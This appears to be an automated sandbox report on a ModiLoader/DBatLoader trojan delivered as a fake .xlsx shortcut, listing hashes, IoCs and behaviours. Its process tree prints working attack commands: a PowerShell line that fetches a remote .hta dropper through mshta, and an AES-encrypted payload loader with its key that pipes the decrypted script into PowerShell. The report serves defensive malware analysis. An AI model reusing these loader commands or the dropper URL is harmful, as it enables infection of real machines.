modiloader | e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3

General

Target

FT. 40FE CNY .xlsx.lnk
Size

2KB
MD5

82fde340f187a517e0feced1d4972363
SHA1

07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256

e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
SHA512

db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c

Score

10^/10

modiloader trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.sessosesso.it/assets/aw/yt.hta

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3304-114-0x0000000002A80000-0x0000000003A80000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

6 3900 mshta.exe
10 3900 mshta.exe
12 3900 mshta.exe
28 876 powershell.exe
29 876 powershell.exe

flow	pid	process
6	3900	mshta.exe
10	3900	mshta.exe
12	3900	mshta.exe
28	876	powershell.exe
29	876	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

Processes:

uc.exe

pid process

3304 uc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4600 3304 WerFault.exe uc.exe

pid	process
3304	uc.exe

pid	pid_target	process	target process
4600	3304	WerFault.exe	uc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	66	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	72	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2516 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2860 powershell.exe
2860 powershell.exe
868 powershell.exe
868 powershell.exe
876 powershell.exe
876 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2860 powershell.exe
Token: SeDebugPrivilege 868 powershell.exe
Token: SeDebugPrivilege 876 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

2516 EXCEL.EXE
2516 EXCEL.EXE

pid	process
2860	powershell.exe
2860	powershell.exe
868	powershell.exe
868	powershell.exe
876	powershell.exe
876	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE
2516	EXCEL.EXE

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exepowershell.exe

description	pid	process	target process
PID 5080 wrote to memory of 2860	5080	cmd.exe	powershell.exe
PID 5080 wrote to memory of 2860	5080	cmd.exe	powershell.exe
PID 2860 wrote to memory of 3900	2860	powershell.exe	mshta.exe
PID 2860 wrote to memory of 3900	2860	powershell.exe	mshta.exe
PID 3900 wrote to memory of 868	3900	mshta.exe	powershell.exe
PID 3900 wrote to memory of 868	3900	mshta.exe	powershell.exe
PID 868 wrote to memory of 876	868	powershell.exe	powershell.exe
PID 868 wrote to memory of 876	868	powershell.exe	powershell.exe
PID 876 wrote to memory of 2516	876	powershell.exe	EXCEL.EXE
PID 876 wrote to memory of 2516	876	powershell.exe	EXCEL.EXE
PID 876 wrote to memory of 2516	876	powershell.exe	EXCEL.EXE
PID 876 wrote to memory of 3304	876	powershell.exe	uc.exe
PID 876 wrote to memory of 3304	876	powershell.exe	uc.exe
PID 876 wrote to memory of 3304	876	powershell.exe	uc.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\FT. 40FE CNY .xlsx.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
5⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\Book1.xlsx"
6⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2516

C:\Users\Admin\AppData\Roaming\uc.exe
"C:\Users\Admin\AppData\Roaming\uc.exe"
6⤵
- Executes dropped EXE
PID:3304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 1716
7⤵
- Program crash
PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3840 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
1⤵
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3304 -ip 3304
1⤵
PID:60

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eqvzygv1.xuq.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Book1.xlsx
Filesize
7KB

MD5
1bf87ff1495f215ddfb6c3790dbe6ce9

SHA1
68cf7434e8b064ae913ad6f1c35b6fbbfaa611e8

SHA256
7af5ae538f476b80c64c21104a5898000e309368ea1515adeea90fb19127503b

SHA512
1ff153660a86f0048e0bb24684d2d9508a8eab2b91ea5d844001437d7445f5c7ecf4b0258ea8f033e22160e14583cadefc4e9b1af7f195310a0d0537fb9b7ac5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Filesize
219B

MD5
a78c7a2f12efeec747d8f4301d119d95

SHA1
196ba9641b4a0a0f805e696547c4c3605f7dc877

SHA256
72513190c8b0fb0ead0238310762adb1e582c58276a456b50f9f3aced9dd6cbb

SHA512
313f966d5523929ac7e1c5dbb5a4d260aa63e26dd1d8a75edf7c73eca500aa8efdbbb9c9e6d68aae79ef2929288806e1d5bf33ce086071642df8aff3c06aa58d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize
855B

MD5
d6e59fa5769b99598b03a38de0060922

SHA1
3ab584f324defac66f11c3f95411375c3d50a4e8

SHA256
ce0e8fd860a2d60b494561f1bf907968c71dd616ef5cecfe3ff1199272be4615

SHA512
54a77a6ff0592fc73c4762931b9ed0a8f4d79aab8b366584dccc3561de40ff0d3e8423c7feb74d88362f3f8e0fc5c6986a954c5b0b1d11207c4d3aae538600ad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize
24B

MD5
4fcb2a3ee025e4a10d21e1b154873fe2

SHA1
57658e2fa594b7d0b99d02e041d0f3418e58856b

SHA256
90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

SHA512
4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

Download Submit
C:\Users\Admin\AppData\Roaming\uc.exe
Filesize
1.6MB

MD5
e6ac6ca27aa2d60dc59a21af1ffdb086

SHA1
9f847e34521e8917c8b22eca53b71306bc19af18

SHA256
a5b3ce892d48757df98fea906dff92e0210dcbd8d1832e43dfbd2a5ece61fba1

SHA512
9f4c1e3cb03cd1333a7f2e01f7a3d61803844fc4c1531dd432cc7b7dedc5625d1253715200cb7e0f6b9c7f906a6dcbb488196153e1e2dc935b27b66d74431ee4

Download Submit
memory/868-34-0x0000018F33FF0000-0x0000018F34000000-memory.dmp

Filesize
64KB

Download
memory/868-96-0x00007FFC4D5B0000-0x00007FFC4E071000-memory.dmp

Filesize
10.8MB

Download
memory/868-28-0x0000018F33FF0000-0x0000018F34000000-memory.dmp

Filesize
64KB

Download
memory/868-27-0x00007FFC4D5B0000-0x00007FFC4E071000-memory.dmp

Filesize
10.8MB

Download
memory/868-80-0x00007FFC4D5B0000-0x00007FFC4E071000-memory.dmp

Filesize
10.8MB

Download
memory/876-52-0x0000016835A90000-0x0000016835AD4000-memory.dmp

Filesize
272KB

Download
memory/876-53-0x0000016835D80000-0x0000016835DF6000-memory.dmp

Filesize
472KB

Download
memory/876-42-0x000001681D190000-0x000001681D1A0000-memory.dmp

Filesize
64KB

Download
memory/876-41-0x000001681D190000-0x000001681D1A0000-memory.dmp

Filesize
64KB

Download
memory/876-40-0x00007FFC4D5B0000-0x00007FFC4E071000-memory.dmp

Filesize
10.8MB

Download
memory/876-93-0x00007FFC4D5B0000-0x00007FFC4E071000-memory.dmp

Filesize
10.8MB

Download
memory/2516-77-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-57-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-67-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-69-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-68-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-70-0x00007FFC2DCA0000-0x00007FFC2DCB0000-memory.dmp

Filesize
64KB

Download
memory/2516-71-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-72-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-73-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-74-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-75-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-62-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-78-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-76-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-79-0x00007FFC2DCA0000-0x00007FFC2DCB0000-memory.dmp

Filesize
64KB

Download
memory/2516-63-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-65-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-66-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-64-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-59-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-60-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-166-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-158-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-160-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-161-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-165-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-162-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-164-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-163-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-159-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-58-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-61-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/2516-133-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2516-134-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/2860-18-0x00007FFC4E980000-0x00007FFC4F441000-memory.dmp

Filesize
10.8MB

Download
memory/2860-14-0x0000017DE6D80000-0x0000017DE6D90000-memory.dmp

Filesize
64KB

Download
memory/2860-13-0x0000017DE6D80000-0x0000017DE6D90000-memory.dmp

Filesize
64KB

Download
memory/2860-12-0x00007FFC4E980000-0x00007FFC4F441000-memory.dmp

Filesize
10.8MB

Download
memory/2860-7-0x0000017DE6D90000-0x0000017DE6DB2000-memory.dmp

Filesize
136KB

Download
memory/3304-119-0x0000000000400000-0x000000000059C000-memory.dmp

Filesize
1.6MB

Download
memory/3304-114-0x0000000002A80000-0x0000000003A80000-memory.dmp

Filesize
16.0MB

Download
memory/3304-113-0x0000000002A80000-0x0000000003A80000-memory.dmp

Filesize
16.0MB

Download
memory/3304-112-0x0000000000A90000-0x0000000000A91000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads